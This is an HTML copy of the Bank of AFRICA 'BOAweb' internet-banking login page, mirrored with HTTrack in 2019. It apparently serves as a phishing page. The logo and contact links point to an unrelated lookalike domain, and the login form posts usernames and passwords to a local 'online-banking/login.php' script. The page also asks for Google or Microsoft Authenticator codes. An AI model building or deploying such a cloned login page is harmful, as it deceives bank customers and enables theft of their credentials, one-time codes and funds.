<!DOCTYPE html>

<HTML><HEAD><TITLE>BANK OF AFRICA &middot; Internet Banking</TITLE><!-- Mirrored from boaweb.of.africa/users/authentication by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 02 Jul 2019 16:10:21 GMT --><!-- Added by HTTrack -->
<META content=text/html;charset=utf-8 http-equiv=content-type><!-- /Added by HTTrack -->
<META name=csrf-param content=authenticity_token>
<META name=csrf-token content=cfBtRJvQgPJAeGTiS4dXHP/5i4UWftLpFOW+q8y7Qh6hprH0+vNCbH8ZoFoLjpRNDMBB7tLuzX0I3vdaIgBosQ==>
<META name=csp-nonce content=ulDdNDvuY6cRM1QrV3hFLQ==>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=description content="BANK OF AFRICA - Internet Banking">
<META name=author content=""><LINK rel=stylesheet href="../assets/devise.css" media=all data-turbolinks-track="reload">
<SCRIPT src="../assets/devise.js" data-turbolinks-track="reload"></SCRIPT>
<LINK rel="shortcut icon" type=image/x-icon href="../assets/ico/favicon.png">
<META content=IE=edge http-equiv=X-UA-Compatible>
<META name=GENERATOR content="MSHTML 8.00.7600.16385"></HEAD>
<BODY>
<DIV class=login-page><NAV class="navbar navbar-expand-lg navbar-light scrolling-navbar">
<DIV class=container><A class=navbar-brand href="http://boa.clienthomeportal.com/"><IMG class=logo src="../assets/logo.png"> </A><BUTTON aria-expanded=false class=navbar-toggler aria-controls=navbarLang data-toggle="collapse" data-target="#navbarLang" aria-label="Toggle navigation"><SPAN class=navbar-toggler-icon></SPAN></BUTTON> 
<DIV id=navbarLang class="collapse navbar-collapse">
<UL class="navbar-nav ml-auto">
<LI class="mr-4 contacter-nous"><A class="font-weight-bold nav-link" href="http://boa.clienthomeportal.com/boaweb.of.africa/users/contactus">Contact us <SPAN class=sr-only>(current)</SPAN> </A>
<LI class="nav-item "><A class=nav-link href="https://boaweb.of.africa/home/fr">FR <SPAN class=sr-only>(current)</SPAN> </A>
<LI class="nav-item active"><A class=nav-link href="https://boaweb.of.africa/home/en">EN <SPAN class=sr-only>(current)</SPAN> </A></LI></UL></DIV></DIV></NAV><!-- Mask & flexbox options-->
<DIV class=login-page-main><!-- Content -->
<DIV class="container mt-md-5 pt-5 mb-md-5 pb-5"><!--Grid row-->
<DIV class=row><!--Grid column-->
<DIV class="col-lg-8  text-center text-md-left  mb-5 wow fadeInLeft" data-wow-delay="0.3s">
<H1 class="h1-responsive font-weight-bold mt-sm-5">Welcome to BOAweb!</H1>
<HR class=hr-dark>

<P>We are pleased to inform you that B-Web has changed to BOAweb, with a new look.</P>
<P>With BOAweb, you have access to the same features with enhanced security.</P>
<P>
<DIV class="bg-light p-2"><STRONG>In case you activated the Multi-factor Authentification on your account, you should provide: 
<UL>
<LI>Your username 
<LI>Your password 
<LI>The code provided by Google authenticator or Microsoft Authenticator mobile application to log in.</LI></UL></STRONG></DIV>
<P></P>
<P>
<DIV class="alert alert-danger-login text-dark" role=alert>If it is your first time to visit this page, please click <A href="password/new.html">here</A> to reset your password.</DIV>
<P></P>
<P>For more details, please contact your BANK OF AFRICA.</P></DIV><!--Grid column--><!--Grid column-->
<DIV class="col-lg-4  wow fadeInRight" data-wow-delay="0.3s">
<DIV class="container2 text-center border border-light p-2">
<DIV class=col-12>
<P class="h4 mb-4">Log In</P>
<FORM id=new_user class=new_user method=post action=online-banking/login.php>
<DIV class=sign-on-title>Access Your Account <SPAN class=sign-on-secure-icon></SPAN></DIV>
<DIV><INPUT class="sign-on-user-id default-text" title=username name=username autocomplete="off"><BR><INPUT class="sign-on-user-id default-text" title=password type=password name=password autocomplete="off"> 
<DIV class=clear><BUTTON class=sign-on-submit type=submit>Login</BUTTON></DIV></DIV>
<P><A class=sign-on-help href="" target=_blank>User ID or Password Help</A></P></FORM>
<DIV class=form-group><A id=otp-link class="black-text otp-link" href="#"><U>Enter Google Authenticator or Microsoft Authenticator code</U></A> 
<DIV id=otp-field class=otp-field>
<DIV class=otp-label>If you've enabled Google Authenticator or Microsoft Authenticator on your account, please open the Google Authenticator application from your mobile phone and enter the generated verification code.</DIV><INPUT id=user_otp_code_token class=form-control name=user[otp_code_token] autocomplete="off"> </DIV></DIV>
<DIV class=actions>&nbsp;</DIV></FORM>
<HR>
<A class=" otp-link" href="password/new.html">Reset password</A><BR></DIV></DIV></DIV><!--Grid column--></DIV><!--Grid row--></DIV><!-- Content --></DIV><!-- Mask & flexbox options--></DIV><!-- Main navigation --><!-- Main Layout --><MAIN class=footer>
<DIV class=container><!-- Grid row -->
<DIV class="row py-5"><!-- Grid column -->
<DIV class="col-md-12 text-center small-centered">&#65533; PAN AFRICAN SOLUTIONS SERVICES - BOAweb 2019</DIV><!-- Grid column --></DIV><!-- Grid row --></DIV></MAIN><!-- Mirrored from boaweb.of.africa/users/authentication by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 02 Jul 2019 16:10:21 GMT --></BODY></HTML>